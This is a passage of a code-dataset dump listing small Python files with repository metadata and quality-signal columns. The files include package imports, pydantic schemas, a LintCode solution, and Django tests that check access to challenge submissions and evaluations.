64 | 425 | 5.65625 | 0.265625 | 0.165746 | 0.220994 | 0.18232 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.068235 | 425 | 5 | 107 | 85 | 0.914141 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0

**signal flags** (unsuffixed `qsc_*` columns, in schema order):
0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0

**effective:** 0 | **hits:** 6
---

**hexsha:** `dd9d9e745268a05b2a5397b1a32f3f6189d22b3b` | **size:** 41 | **ext:** py | **lang:** Python

| | repo_path | repo_name | repo_head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | `ppq/utils/__init__.py` | `openppl-public/ppq` | `0fdea7d4982bc57feb6bb8548c7f012707fbd607` | ["Apache-2.0"] | 100 | 2021-12-31T09:34:06.000Z | 2022-03-25T02:54:51.000Z |
| max_issues | `ppq/utils/__init__.py` | `openppl-public/ppq` | `0fdea7d4982bc57feb6bb8548c7f012707fbd607` | ["Apache-2.0"] | 12 | 2021-12-31T10:28:15.000Z | 2022-03-31T07:08:44.000Z |
| max_forks | `ppq/utils/__init__.py` | `openppl-public/ppq` | `0fdea7d4982bc57feb6bb8548c7f012707fbd607` | ["Apache-2.0"] | 21 | 2021-12-31T09:51:02.000Z | 2022-03-30T12:21:55.000Z |

**content:**

```python
from .attribute import process_attribute
```

**stats:** avg_line_length 20.5 | max_line_length 40 | alphanum_fraction 0.878049

**quality signals** (`qsc_*_quality_signal` columns, in schema order):
5 | 41 | 7 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.097561 | 41 | 1 | 41 | 41 | 0.945946 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0

**signal flags** (unsuffixed `qsc_*` columns, in schema order):
1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0

**effective:** 0 | **hits:** 6
---

**hexsha:** `6620a1da84d2b9ed5781d255a6553d73c0a0fa9e` | **size:** 186 | **ext:** py | **lang:** Python

| | repo_path | repo_name | repo_head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | `backend/users/schema.py` | `DDoS000/Event_Registers` | `84a77d0914333ee830a72e2d31fa5374f70dea35` | ["MIT"] | null | null | null |
| max_issues | `backend/users/schema.py` | `DDoS000/Event_Registers` | `84a77d0914333ee830a72e2d31fa5374f70dea35` | ["MIT"] | null | null | null |
| max_forks | `backend/users/schema.py` | `DDoS000/Event_Registers` | `84a77d0914333ee830a72e2d31fa5374f70dea35` | ["MIT"] | null | null | null |

**content:**

```python
from pydantic import BaseModel
class UserUpdate(BaseModel):
fullname: str
class ChangePassword(BaseModel):
current_password: str
new_password: str
confirm_password: str
```

**stats:** avg_line_length 20.666667 | max_line_length 32 | alphanum_fraction 0.768817

**quality signals** (`qsc_*_quality_signal` columns, in schema order):
21 | 186 | 6.666667 | 0.619048 | 0.235714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.177419 | 186 | 9 | 33 | 20.666667 | 0.915033 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.571429 | 0.142857 | 0 | 1 | 0

**signal flags** (unsuffixed `qsc_*` columns, in schema order):
1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0

**effective:** 0 | **hits:** 6
---

**hexsha:** `662b2a0d020eee523039d18045fe01c4d90be8ba` | **size:** 61 | **ext:** py | **lang:** Python

| | repo_path | repo_name | repo_head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | `psi/serialize/__init__.py` | `delta-mpc/python-psi` | `1665de12a713b37abd889268c66de84cddb1bf84` | ["Apache-2.0"] | 35 | 2021-05-28T10:03:09.000Z | 2022-03-24T12:08:19.000Z |
| max_issues | `psi/serialize/__init__.py` | `delta-mpc/python-psi` | `1665de12a713b37abd889268c66de84cddb1bf84` | ["Apache-2.0"] | 9 | 2021-07-15T09:16:34.000Z | 2022-03-31T03:59:16.000Z |
| max_forks | `psi/serialize/__init__.py` | `delta-mpc/python-psi` | `1665de12a713b37abd889268c66de84cddb1bf84` | ["Apache-2.0"] | 16 | 2021-06-18T02:18:56.000Z | 2022-03-25T02:43:48.000Z |

**content:**

```python
from .bit_arr import *
from .ecc import *
from .int import *
```

**stats:** avg_line_length 15.25 | max_line_length 22 | alphanum_fraction 0.704918

**quality signals** (`qsc_*_quality_signal` columns, in schema order):
10 | 61 | 4.2 | 0.6 | 0.47619 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.196721 | 61 | 3 | 23 | 20.333333 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0

**signal flags** (unsuffixed `qsc_*` columns, in schema order):
1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0

**effective:** 0 | **hits:** 6
---

**hexsha:** `664d6f4bea48853ff584b2801386ca40d6d04218` | **size:** 35 | **ext:** py | **lang:** Python

| | repo_path | repo_name | repo_head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | `DeepChecker/__init__.py` | `Fixy-TR/DeepChecker` | `99bf6e133890aa44711536723ad9acf16314830d` | ["MIT"] | 21 | 2020-08-05T20:52:35.000Z | 2022-02-18T19:27:21.000Z |
| max_issues | `DeepChecker/__init__.py` | `umitylmz/DeepChecker` | `99bf6e133890aa44711536723ad9acf16314830d` | ["MIT"] | null | null | null |
| max_forks | `DeepChecker/__init__.py` | `umitylmz/DeepChecker` | `99bf6e133890aa44711536723ad9acf16314830d` | ["MIT"] | 6 | 2020-08-05T14:17:12.000Z | 2022-03-03T05:52:28.000Z |

**content:**

```python
from DeepChecker.Checkers import *
```

**stats:** avg_line_length 17.5 | max_line_length 34 | alphanum_fraction 0.828571

**quality signals** (`qsc_*_quality_signal` columns, in schema order):
4 | 35 | 7.25 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.114286 | 35 | 1 | 35 | 35 | 0.935484 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0

**signal flags** (unsuffixed `qsc_*` columns, in schema order):
1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0

**effective:** 0 | **hits:** 6
---

**hexsha:** `664f4b3b2027544507e9b37e6ef7413af737a3d5` | **size:** 231 | **ext:** py | **lang:** Python

| | repo_path | repo_name | repo_head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | `1101-1200/1163-Distribute Candies/1163-Distribute Candies.py` | `jiadaizhao/LintCode` | `a8aecc65c47a944e9debad1971a7bc6b8776e48b` | ["MIT"] | 77 | 2017-12-30T13:33:37.000Z | 2022-01-16T23:47:08.000Z |
| max_issues | `1101-1200/1163-Distribute Candies/1163-Distribute Candies.py` | `jxhangithub/LintCode-1` | `a8aecc65c47a944e9debad1971a7bc6b8776e48b` | ["MIT"] | 1 | 2018-05-14T14:15:40.000Z | 2018-05-14T14:15:40.000Z |
| max_forks | `1101-1200/1163-Distribute Candies/1163-Distribute Candies.py` | `jxhangithub/LintCode-1` | `a8aecc65c47a944e9debad1971a7bc6b8776e48b` | ["MIT"] | 39 | 2017-12-07T14:36:25.000Z | 2022-03-10T23:05:37.000Z |

**content:**

```python
class Solution:
"""
@param candies: a list of integers
@return: return a integer
"""
def distributeCandies(self, candies):
# write your code here
return min(len(set(candies)), len(candies) // 2)
```

**stats:** avg_line_length 25.666667 | max_line_length 56 | alphanum_fraction 0.61039

**quality signals** (`qsc_*_quality_signal` columns, in schema order):
28 | 231 | 5.035714 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005952 | 0.272727 | 231 | 8 | 57 | 28.875 | 0.833333 | 0.354978 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 0 | 1 | 0.333333 | false | 0 | 0 | 0.333333 | 1 | 0

**signal flags** (unsuffixed `qsc_*` columns, in schema order):
1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0

**effective:** 0 | **hits:** 6
---

**hexsha:** `66542479cdedfadc3cc79ca36adbd5a5951278b3` | **size:** 43 | **ext:** py | **lang:** Python

| | repo_path | repo_name | repo_head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | `tests/test_MBS/__init__.py` | `bigdata-ustc/EduSim` | `849eed229c24615e5f2c3045036311e83c22ea68` | ["MIT"] | 18 | 2019-11-11T03:45:35.000Z | 2022-02-09T15:31:51.000Z |
| max_issues | `tests/test_MBS/__init__.py` | `ghzhao78506/EduSim` | `cb10e952eb212d8a9344143f889207b5cd48ba9d` | ["MIT"] | 3 | 2020-10-23T01:05:57.000Z | 2021-03-16T12:12:24.000Z |
| max_forks | `tests/test_MBS/__init__.py` | `bigdata-ustc/EduSim` | `849eed229c24615e5f2c3045036311e83c22ea68` | ["MIT"] | 6 | 2020-06-09T21:32:00.000Z | 2022-03-12T00:25:18.000Z |

**content:**

```python
# coding: utf-8
# 2021/03/12 @ zhaoguanhao
```

**stats:** avg_line_length 14.333333 | max_line_length 26 | alphanum_fraction 0.674419

**quality signals** (`qsc_*_quality_signal` columns, in schema order):
7 | 43 | 4.142857 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.25 | 0.162791 | 43 | 2 | 27 | 21.5 | 0.555556 | 0.883721 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null

**signal flags** (unsuffixed `qsc_*` columns, in schema order):
1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0

**effective:** 0 | **hits:** 6
---

**hexsha:** `b08a93c2485c9207b162b22abf4d7cb7a8947024` | **size:** 173 | **ext:** py | **lang:** Python

| | repo_path | repo_name | repo_head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | `bitwise/logic/__init__.py` | `jamesjiang52/Bitwise` | `c71f151d23034b3f9e2a939f637be0eaa16c45c3` | ["MIT"] | null | null | null |
| max_issues | `bitwise/logic/__init__.py` | `jamesjiang52/Bitwise` | `c71f151d23034b3f9e2a939f637be0eaa16c45c3` | ["MIT"] | null | null | null |
| max_forks | `bitwise/logic/__init__.py` | `jamesjiang52/Bitwise` | `c71f151d23034b3f9e2a939f637be0eaa16c45c3` | ["MIT"] | null | null | null |

**content:**

```python
from .AND import *
from .COMP import *
from .NAND import *
from .NOR import *
from .NOT import *
from .OR import *
from .PAR import *
from .XNOR import *
from .XOR import *
```

**stats:** avg_line_length 17.3 | max_line_length 19 | alphanum_fraction 0.687861

**quality signals** (`qsc_*_quality_signal` columns, in schema order):
27 | 173 | 4.407407 | 0.407407 | 0.672269 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.208092 | 173 | 9 | 20 | 19.222222 | 0.868613 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0

**signal flags** (unsuffixed `qsc_*` columns, in schema order):
1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0

**effective:** 0 | **hits:** 6
---

**hexsha:** `7c0a7ee8a1d12afb4a736f3531f18c61cfd4058f` | **size:** 100 | **ext:** py | **lang:** Python

| | repo_path | repo_name | repo_head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | `mr/request.py` | `chiselko6/MapReduce` | `dde409525b1fa121fd5ecefafc13414032c01f1c` | ["MIT"] | 1 | 2021-03-11T22:18:56.000Z | 2021-03-11T22:18:56.000Z |
| max_issues | `mr/request.py` | `chiselko6/MapReduce` | `dde409525b1fa121fd5ecefafc13414032c01f1c` | ["MIT"] | null | null | null |
| max_forks | `mr/request.py` | `chiselko6/MapReduce` | `dde409525b1fa121fd5ecefafc13414032c01f1c` | ["MIT"] | null | null | null |

**content:**

```python
def is_success(code):
return code == 'ok'
def is_error_code(code):
return code == 'ERROR'
```

**stats:** avg_line_length 14.285714 | max_line_length 26 | alphanum_fraction 0.64

**quality signals** (`qsc_*_quality_signal` columns, in schema order):
15 | 100 | 4.066667 | 0.466667 | 0.163934 | 0.459016 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.22 | 100 | 6 | 27 | 16.666667 | 0.782051 | 0 | 0 | 0 | 0 | 0 | 0.07 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0 | 0 | 0.5 | 1 | 0

**signal flags** (unsuffixed `qsc_*` columns, in schema order):
1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0

**effective:** 0 | **hits:** 6
---

**hexsha:** `b0433121aa8bbd1327d3221055a476dfcaf07db3` | **size:** 136 | **ext:** py | **lang:** Python

| | repo_path | repo_name | repo_head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | `case3/test_calc.py` | `emre/unit-test-workshop` | `6a323dd7ffac08e7aa56e09d307798d4ae984fa9` | ["MIT"] | 1 | 2017-11-20T18:15:12.000Z | 2017-11-20T18:15:12.000Z |
| max_issues | `case3/test_calc.py` | `emre/unit-test-workshop` | `6a323dd7ffac08e7aa56e09d307798d4ae984fa9` | ["MIT"] | null | null | null |
| max_forks | `case3/test_calc.py` | `emre/unit-test-workshop` | `6a323dd7ffac08e7aa56e09d307798d4ae984fa9` | ["MIT"] | null | null | null |

**content:**

```python
import unittest
# https://docs.python.org/3/library/unittest.html
from calc import Calc
class TestCalc(unittest.TestCase):
pass
```

**stats:** avg_line_length 13.6 | max_line_length 49 | alphanum_fraction 0.757353

**quality signals** (`qsc_*_quality_signal` columns, in schema order):
19 | 136 | 5.421053 | 0.789474 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008547 | 0.139706 | 136 | 9 | 50 | 15.111111 | 0.871795 | 0.345588 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.25 | 0.5 | 0 | 0.75 | 0

**signal flags** (unsuffixed `qsc_*` columns, in schema order):
1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0

**effective:** 0 | **hits:** 6
---

**hexsha:** `c68a6d8f407663035b0e8aaa5e7a9d1c6021d7ca` | **size:** 11,082 | **ext:** py | **lang:** Python

| | repo_path | repo_name | repo_head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | `app/tests/evaluation_tests/test_views.py` | `njmhendrix/grand-challenge.org` | `9bc36f5e26561a78bd405e8ea5e4c0f86c95f011` | ["Apache-2.0"] | null | null | null |
| max_issues | `app/tests/evaluation_tests/test_views.py` | `njmhendrix/grand-challenge.org` | `9bc36f5e26561a78bd405e8ea5e4c0f86c95f011` | ["Apache-2.0"] | null | null | null |
| max_forks | `app/tests/evaluation_tests/test_views.py` | `njmhendrix/grand-challenge.org` | `9bc36f5e26561a78bd405e8ea5e4c0f86c95f011` | ["Apache-2.0"] | null | null | null |

**content:**

```python
from collections import namedtuple
from datetime import timedelta
import factory
import pytest
from django.db.models import signals
from django.utils import timezone
from tests.factories import (
EvaluationFactory,
MethodFactory,
SubmissionFactory,
)
from tests.utils import (
get_view_for_user,
validate_admin_only_view,
validate_admin_or_participant_view,
validate_open_view,
)
def submission_and_evaluation(*, challenge, creator):
"""Creates a submission and an evaluation for that submission."""
s = SubmissionFactory(challenge=challenge, creator=creator)
e = EvaluationFactory(submission=s)
return s, e
def submissions_and_evaluations(two_challenge_sets):
"""
Create (e)valuations and (s)ubmissions for each (p)articipant and
(c)hallenge.
"""
SubmissionsAndEvaluations = namedtuple(
"SubmissionsAndEvaluations",
[
"p_s1",
"p_s2",
"p1_s1",
"p12_s1_c1",
"p12_s1_c2",
"e_p_s1",
"e_p_s2",
"e_p1_s1",
"e_p12_s1_c1",
"e_p12_s1_c2",
],
)
# participant 0, submission 1, challenge 1, etc
p_s1, e_p_s1 = submission_and_evaluation(
challenge=two_challenge_sets.challenge_set_1.challenge,
creator=two_challenge_sets.challenge_set_1.participant,
)
p_s2, e_p_s2 = submission_and_evaluation(
challenge=two_challenge_sets.challenge_set_1.challenge,
creator=two_challenge_sets.challenge_set_1.participant,
)
p1_s1, e_p1_s1 = submission_and_evaluation(
challenge=two_challenge_sets.challenge_set_1.challenge,
creator=two_challenge_sets.challenge_set_1.participant1,
)
# participant12, submission 1 to each challenge
p12_s1_c1, e_p12_s1_c1 = submission_and_evaluation(
challenge=two_challenge_sets.challenge_set_1.challenge,
creator=two_challenge_sets.participant12,
)
p12_s1_c2, e_p12_s1_c2 = submission_and_evaluation(
challenge=two_challenge_sets.challenge_set_2.challenge,
creator=two_challenge_sets.participant12,
)
return SubmissionsAndEvaluations(
p_s1,
p_s2,
p1_s1,
p12_s1_c1,
p12_s1_c2,
e_p_s1,
e_p_s2,
e_p1_s1,
e_p12_s1_c1,
e_p12_s1_c2,
)
@pytest.mark.django_db
def test_method_list(client, two_challenge_sets):
validate_admin_only_view(
viewname="evaluation:method-list",
two_challenge_set=two_challenge_sets,
client=client,
)
@pytest.mark.django_db
def test_method_create(client, two_challenge_sets):
validate_admin_only_view(
viewname="evaluation:method-create",
two_challenge_set=two_challenge_sets,
client=client,
)
@pytest.mark.django_db
def test_method_detail(client, two_challenge_sets):
method = MethodFactory(
challenge=two_challenge_sets.challenge_set_1.challenge,
creator=two_challenge_sets.challenge_set_1.admin,
)
validate_admin_only_view(
viewname="evaluation:method-detail",
two_challenge_set=two_challenge_sets,
reverse_kwargs={"pk": method.pk},
client=client,
)
@pytest.mark.django_db
@factory.django.mute_signals(signals.post_save)
def test_submission_list(client, two_challenge_sets):
validate_admin_or_participant_view(
viewname="evaluation:submission-list",
two_challenge_set=two_challenge_sets,
client=client,
)
p_s1, p_s2, p1_s1, p12_s1_c1, p12_s1_c2, *_ = submissions_and_evaluations(
two_challenge_sets
)
# Participants should only be able to see their own submissions
response = get_view_for_user(
viewname="evaluation:submission-list",
challenge=two_challenge_sets.challenge_set_1.challenge,
client=client,
user=two_challenge_sets.challenge_set_1.participant,
)
assert str(p_s1.pk) in response.rendered_content
assert str(p_s2.pk) in response.rendered_content
assert str(p1_s1.pk) not in response.rendered_content
assert str(p12_s1_c1.pk) not in response.rendered_content
assert str(p12_s1_c2.pk) not in response.rendered_content
# Admins should be able to see all submissions
response = get_view_for_user(
viewname="evaluation:submission-list",
challenge=two_challenge_sets.challenge_set_1.challenge,
client=client,
user=two_challenge_sets.challenge_set_1.admin,
)
assert str(p_s1.pk) in response.rendered_content
assert str(p_s2.pk) in response.rendered_content
assert str(p1_s1.pk) in response.rendered_content
assert str(p12_s1_c1.pk) in response.rendered_content
assert str(p12_s1_c2.pk) not in response.rendered_content
# Only submissions relevant to this challenge should be listed
response = get_view_for_user(
viewname="evaluation:submission-list",
challenge=two_challenge_sets.challenge_set_1.challenge,
client=client,
user=two_challenge_sets.participant12,
)
assert str(p12_s1_c1.pk) in response.rendered_content
assert str(p12_s1_c2.pk) not in response.rendered_content
assert str(p_s1.pk) not in response.rendered_content
assert str(p_s2.pk) not in response.rendered_content
assert str(p1_s1.pk) not in response.rendered_content
@pytest.mark.django_db
def test_submission_create(client, two_challenge_sets):
validate_admin_or_participant_view(
viewname="evaluation:submission-create",
two_challenge_set=two_challenge_sets,
client=client,
)
response = get_view_for_user(
viewname="evaluation:submission-create",
challenge=two_challenge_sets.challenge_set_1.challenge,
user=two_challenge_sets.challenge_set_1.participant,
client=client,
)
assert response.status_code == 200
assert "Creator" not in response.rendered_content
@pytest.mark.django_db
def test_legacy_submission_create(client, two_challenge_sets):
validate_admin_only_view(
viewname="evaluation:submission-create-legacy",
two_challenge_set=two_challenge_sets,
client=client,
)
response = get_view_for_user(
viewname="evaluation:submission-create-legacy",
challenge=two_challenge_sets.challenge_set_1.challenge,
user=two_challenge_sets.admin12,
client=client,
)
assert response.status_code == 200
assert "Creator" in response.rendered_content
@pytest.mark.django_db
def test_submission_time_limit(client, two_challenge_sets):
SubmissionFactory(
challenge=two_challenge_sets.challenge_set_1.challenge,
creator=two_challenge_sets.challenge_set_1.participant,
)
def get_submission_view():
return get_view_for_user(
viewname="evaluation:submission-create",
challenge=two_challenge_sets.challenge_set_1.challenge,
client=client,
user=two_challenge_sets.challenge_set_1.participant,
)
assert "make 9 more" in get_submission_view().rendered_content
s = SubmissionFactory(
challenge=two_challenge_sets.challenge_set_1.challenge,
creator=two_challenge_sets.challenge_set_1.participant,
)
s.created = timezone.now() - timedelta(hours=23)
s.save()
assert "make 8 more" in get_submission_view().rendered_content
s = SubmissionFactory(
challenge=two_challenge_sets.challenge_set_1.challenge,
creator=two_challenge_sets.challenge_set_1.participant,
)
s.created = timezone.now() - timedelta(hours=25)
s.save()
assert "make 8 more" in get_submission_view().rendered_content
@pytest.mark.django_db
def test_submission_detail(client, two_challenge_sets):
submission = SubmissionFactory(
challenge=two_challenge_sets.challenge_set_1.challenge,
creator=two_challenge_sets.challenge_set_1.participant,
)
validate_admin_only_view(
viewname="evaluation:submission-detail",
two_challenge_set=two_challenge_sets,
reverse_kwargs={"pk": submission.pk},
client=client,
)
@pytest.mark.django_db
@factory.django.mute_signals(signals.post_save)
def test_evaluation_list(client, two_challenge_sets):
validate_admin_or_participant_view(
viewname="evaluation:list",
two_challenge_set=two_challenge_sets,
client=client,
)
(
*_,
e_p_s1,
e_p_s2,
e_p1_s1,
e_p12_s1_c1,
e_p12_s1_c2,
) = submissions_and_evaluations(two_challenge_sets)
# Participants should only be able to see their own evaluations
response = get_view_for_user(
viewname="evaluation:list",
challenge=two_challenge_sets.challenge_set_1.challenge,
client=client,
user=two_challenge_sets.challenge_set_1.participant,
)
assert str(e_p_s1.pk) in response.rendered_content
assert str(e_p_s2.pk) in response.rendered_content
assert str(e_p1_s1.pk) not in response.rendered_content
assert str(e_p12_s1_c1.pk) not in response.rendered_content
assert str(e_p12_s1_c2.pk) not in response.rendered_content
# Admins should be able to see all evaluations
response = get_view_for_user(
viewname="evaluation:list",
challenge=two_challenge_sets.challenge_set_1.challenge,
client=client,
user=two_challenge_sets.challenge_set_1.admin,
)
assert str(e_p_s1.pk) in response.rendered_content
assert str(e_p_s2.pk) in response.rendered_content
assert str(e_p1_s1.pk) in response.rendered_content
assert str(e_p12_s1_c1.pk) in response.rendered_content
assert str(e_p12_s1_c2.pk) not in response.rendered_content
# Only evaluations relevant to this challenge should be listed
response = get_view_for_user(
viewname="evaluation:list",
challenge=two_challenge_sets.challenge_set_1.challenge,
client=client,
user=two_challenge_sets.participant12,
)
assert str(e_p12_s1_c1.pk) in response.rendered_content
assert str(e_p12_s1_c2.pk) not in response.rendered_content
assert str(e_p_s1.pk) not in response.rendered_content
assert str(e_p_s2.pk) not in response.rendered_content
assert str(e_p1_s1.pk) not in response.rendered_content
@pytest.mark.django_db
def test_leaderboard(client, eval_challenge_set):
validate_open_view(
viewname="evaluation:leaderboard",
challenge_set=eval_challenge_set.challenge_set,
client=client,
)
# TODO: test that private results cannot be seen
@pytest.mark.django_db
def test_evaluation_detail(client, eval_challenge_set):
submission = SubmissionFactory(
challenge=eval_challenge_set.challenge_set.challenge,
creator=eval_challenge_set.challenge_set.participant,
)
e = EvaluationFactory(submission=submission)
validate_open_view(
viewname="evaluation:detail",
challenge_set=eval_challenge_set.challenge_set,
reverse_kwargs={"pk": e.pk},
client=client,
)
```

**stats:** avg_line_length 33.889908 | max_line_length 78 | alphanum_fraction 0.721891

**quality signals** (`qsc_*_quality_signal` columns, in schema order):
1,447 | 11,082 | 5.16586 | 0.085695 | 0.105953 | 0.124147 | 0.110368 | 0.849097 | 0.818595 | 0.800268 | 0.770301 | 0.76495 | 0.723612 | 0 | 0.026122 | 0.202039 | 11,082 | 326 | 79 | 33.993865 | 0.819179 | 0.055405 | 0 | 0.535971 | 0 | 0 | 0.057978 | 0.03862 | 0 | 0 | 0 | 0.003067 | 0.133094 | 1 | 0.05036 | false | 0 | 0.028777 | 0.003597 | 0.089928 | 0

**signal flags** (unsuffixed `qsc_*` columns, in schema order):
0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0

**effective:** 0 | **hits:** 6
---

**hexsha:** `c691c92322330bef3cb93860c43c284649dcb60d` | **size:** 120 | **ext:** py | **lang:** Python

| | repo_path | repo_name | repo_head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | `cronicl/tracers/__init__.py` | `joocer/cronicl` | `5ab215554939699683752cb7b8549756edff9ea5` | ["Apache-2.0"] | null | null | null |
| max_issues | `cronicl/tracers/__init__.py` | `joocer/cronicl` | `5ab215554939699683752cb7b8549756edff9ea5` | ["Apache-2.0"] | 73 | 2020-10-05T21:00:48.000Z | 2020-11-16T23:29:41.000Z |
| max_forks | `cronicl/tracers/__init__.py` | `joocer/cronicl` | `5ab215554939699683752cb7b8549756edff9ea5` | ["Apache-2.0"] | null | null | null |

**content:**

```python
from .file_tracer import FileTracer
from .null_tracer import NullTracer
from .base_tracer import BaseTracer, get_tracer
```

**stats:** avg_line_length 30 | max_line_length 47 | alphanum_fraction 0.858333

**quality signals** (`qsc_*_quality_signal` columns, in schema order):
17 | 120 | 5.823529 | 0.588235 | 0.363636 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.108333 | 120 | 3 | 48 | 40 | 0.925234 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0

**signal flags** (unsuffixed `qsc_*` columns, in schema order):
1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0

**effective:** 0 | **hits:** 6
---

**hexsha:** `c6cc6e291c2d423fccb4a28cc69ba02ced719b37` | **size:** 186 | **ext:** py | **lang:** Python

| | repo_path | repo_name | repo_head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
